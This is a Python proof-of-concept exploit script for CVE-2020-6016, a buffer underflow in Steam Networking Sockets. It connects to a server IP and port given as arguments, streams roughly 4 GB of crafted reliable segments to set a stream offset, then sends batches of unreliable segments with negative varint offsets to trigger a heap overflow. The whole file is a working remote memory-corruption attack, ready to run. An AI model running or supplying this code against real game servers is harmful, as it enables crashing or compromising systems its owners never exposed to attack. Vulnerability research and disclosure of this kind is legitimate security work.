#/usr/bin/python3

from elementals import Prompter, ProgressBar
import logging
import sys
import socket
import struct
import random
import time

import steam_networking_sockets

####################
# Config Variables #
####################

VULNERABILITY_ID    = "CVE-2020-6016 - 64 bits"
VULNERABILITY_DESC  = "Buffer-Underflow whan handling negative offsets in unreliable datagrams"

ENCRYPTION_TYPE     = True

####################
# Global Variables #
####################

logger = None

##
# Trigger the vulnerability
##
def startExploit(socket_fd):
    #####################
    # Reliable segments #
    #####################
    logger.info("Crafting m_nOffset using the reliable stream position")

    segment_size = 0x500
    segment_pos_size = segment_size + 3
    logic_factor = 50
    total_work = 2 ** 32 - 0x200
    remaining_work = total_work
    bar = ProgressBar('Sent 0x%08x / 0x%08x bytes - %d%% Completed', total_work, 30, True, time_format="Elapsed %M:%S -")
    bar.start()
    num_packets = 0
    current_pos = 1

    # Set the reliable stream position (nOffset)
    # Use big chunks for most of the work
    while remaining_work > 2 * logic_factor * segment_size:
        msg  = bytearray()
        msg += struct.pack("B", 0x40 | 0x8 | 0x7)           # nFrameType = reliable segment with an offset of 32 bits
        msg += struct.pack("<L", current_pos)               # 32bit offset
        # payload header (only once each logic packet)
        if num_packets % logic_factor == 0:
            time.sleep(0.005)
            msg += struct.pack("B", 0x20)                   # Varint msg size
            # Varint for the msg size
            wanted_msg_size = (logic_factor * segment_size) >> 5
            while wanted_msg_size > 0:
                next_value = wanted_msg_size >> 7
                msg += struct.pack("B", (wanted_msg_size & 0x7F) | (0x80 if next_value != 0 else 0x00))
                wanted_msg_size = next_value
        # payload content (always)
        msg += b'\0' * segment_size
        steam_networking_sockets.connectionSend(socket_fd, msg)
        chunk_size = segment_pos_size if num_packets % logic_factor == 0 else segment_size
        bar.advance(chunk_size)
        remaining_work -= chunk_size
        current_pos    += chunk_size
        num_packets += 1
    # Use smallers chunk for the rest
    while remaining_work > 0:
        msg  = bytearray()
        msg += struct.pack("B", 0x40 | 0x8 | 0x7)           # nFrameType = reliable segment with an offset of 32 bits
        msg += struct.pack("<L", current_pos)               # 32bit offset
        # payload
        msg += struct.pack("B", 0x20)                       # Varint msg size
        # Varint for the msg size
        current_chunk = min(segment_size, remaining_work)
        wanted_msg_size = current_chunk >> 5
        while wanted_msg_size > 0:
            next_value = wanted_msg_size >> 7
            msg += struct.pack("B", (wanted_msg_size & 0x7F) | (0x80 if next_value != 0 else 0x00))
            wanted_msg_size = next_value
        msg += b'\0' * current_chunk
        steam_networking_sockets.connectionSend(socket_fd, msg)
        bar.advance(current_chunk + 2)
        num_packets    += 1
        remaining_work -= current_chunk + 2
        current_pos    += current_chunk + 2
    bar.finish()

    #######################
    # Unreliable segments #
    #######################
    logger.info("Crafting m_bLast and m_cbSegSize using the highest seen sequence number")
    msg  = bytearray()
    # 1st unreliable segment to allow for a liberal 2nd segment in a same packet
    msg += struct.pack("B", 0x0 | 0x10 | 0x8)                   # nFrameType = simple unreliable segment, with a message number mask of 32 bits and a negative offset
    msg += struct.pack("<L", num_packets)                       # nLowerBits = msg number
    # Varint for the nOffset (any negative value will do)
    wanted_offset = 2 ** 32 - 1
    while wanted_offset > 0:
        next_value = wanted_offset >> 7
        msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_offset = next_value
    msg += struct.pack("B", 0x2)                                # size
    msg += b'A' * 0x2
    # 20 more unreliable segments with the same msg id, so to purge them outside the map
    for i in range(20):
        msg += struct.pack("B", 0x0 | 0x10 | 0x8)               # nFrameType = simple unreliable segment, with a dynamic msg id offset and a negative offset
        # Varint for the msg number (using 0, to recycle the same id)
        msg += struct.pack("B", 0)
        # Varint for the nOffset (any negative value will do)
        wanted_offset = 2 ** 32 - 1 - (i + 1)
        while wanted_offset > 0:
            next_value = wanted_offset >> 7
            msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
            wanted_offset = next_value
        msg += struct.pack("B", 0x2)                            # size
        msg += b'A' * 0x2
    # 22th unreliable segment so to set the record high message id
    msg += struct.pack("B", 0x0 | 0x10 | 0x8)                   # nFrameType = controllable msg number offset with a negative offset
    # Varint for the msg number
    wanted_msg_num = (2 ** 32) - num_packets + 0x400
    while wanted_msg_num > 0:
        next_value = wanted_msg_num >> 7
        msg += struct.pack("B", (wanted_msg_num & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_msg_num = next_value
    # Varint for the nOffset (any negative value will do)
    wanted_offset = 2 ** 32 - 1
    while wanted_offset > 0:
        next_value = wanted_offset >> 7
        msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_offset = next_value
    msg += struct.pack("B", 0x2)                                # size
    msg += b'B' * 0x2
    # 20 more unreliable segments with the same msg id, so to purge them outside the map
    for i in range(20):
        msg += struct.pack("B", 0x0 | 0x10 | 0x8)               # nFrameType = simple unreliable segment, with a dynamic msg id offset and a negative offset
        # Varint for the msg number (using 0, to recycle the same id)
        msg += struct.pack("B", 0)
        # Varint for the nOffset (any negative value will do)
        wanted_offset = 2 ** 32 - 1 - (i + 1)
        while wanted_offset > 0:
            next_value = wanted_offset >> 7
            msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
            wanted_offset = next_value
        msg += struct.pack("B", 0x2)                            # size
        msg += b'B' * 0x2
    # send all segments in a single message
    steam_networking_sockets.connectionSend(socket_fd, msg)

    logger.info("Crafting m_nMsgNum using the number of nodes in the map")
    msg  = bytearray()
    # 1st unreliable segment
    msg += struct.pack("B", 0x0 | 0x8)                          # nFrameType = simple unreliable segment with a negative offset
    msg += struct.pack("<H", 0x0)                               # nLowerBits = msg number
    # Varint for the nOffset (any negative value will do)
    wanted_offset = 2 ** 32 - 3
    while wanted_offset > 0:
        next_value = wanted_offset >> 7
        msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_offset = next_value
    msg += struct.pack("B", 0x20)                               # size
    msg += b'C' * 0x20
    # 20 more unreliable segments with the same msg id, so to purge them outside the map
    for i in range(20):
        msg += struct.pack("B", 0x0 | 0x10 | 0x8)               # nFrameType = simple unreliable segment, with a dynamic msg id offset and a negative offset
        # Varint for the msg number (using 0, to recycle the same id)
        msg += struct.pack("B", 0)
        # Varint for the nOffset (any negative value will do)
        wanted_offset = 2 ** 32 - 3 - (i + 1)
        while wanted_offset > 0:
            next_value = wanted_offset >> 7
            msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
            wanted_offset = next_value
        msg += struct.pack("B", 0x2)                            # size
        msg += b'C' * 0x2
    # 21st unreliable segment
    msg += struct.pack("B", 7 | 0x20 | 0x10 | 0x8)  # nFrameType = 0x07 and bLast = True and we have a varint msg offset + nOffset
    # Varint for the msg number (we aim at 1)
    wanted_msg_num = (2 ** 64) - (2 ** 32 - 1)
    while wanted_msg_num > 0:
        next_value = wanted_msg_num >> 7
        msg += struct.pack("B", (wanted_msg_num & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_msg_num = next_value
    # Varint for the nOffset (any negative value will do)
    wanted_offset = 2 ** 32 - 4
    while wanted_offset > 0:
        next_value = wanted_offset >> 7
        msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_offset = next_value
    # some payload to cause the overall segment size to be just above 0
    msg += b'9' * 0x400
    # send all segments in a single message
    logger.info("Triggering the Heap Overflow")
    steam_networking_sockets.connectionSend(socket_fd, msg)

##
# Prints the usage instructions
##
def printUsage(args):
    print(f"Usage: {args[0]} <server_ip> <server port>")
    print("Exiting")
    exit(1)

##
# Main function (example)
##
def main(args):
    global logger
    # Check the arguments
    if len(args) != 1 + 2:
        print(f"Wrong amount of arguments, got {len(args) - 1}, expected 2.")
        printUsage(args)

    # parse the args
    server_ip   = args[1]
    server_port = int(args[2])

    # open the log
    logger = Prompter(f"Exploit PoC - {VULNERABILITY_ID}", [("exploit_poc.log", "w", logging.INFO)], min_log_level=logging.INFO)
    logger.info("Starting the exploit PoC:")
    logger.addIndent()
    logger.info(VULNERABILITY_ID)
    logger.info(VULNERABILITY_DESC)
    logger.removeIndent()

    # create a Steam Sockets connection
    socket_fd = steam_networking_sockets.createSteamConnection(server_ip, server_port, ENCRYPTION_TYPE, logger)

    # start the attack
    startExploit(socket_fd)

    logger.info("Finished Successfully")

if __name__ == "__main__":
    main(sys.argv)
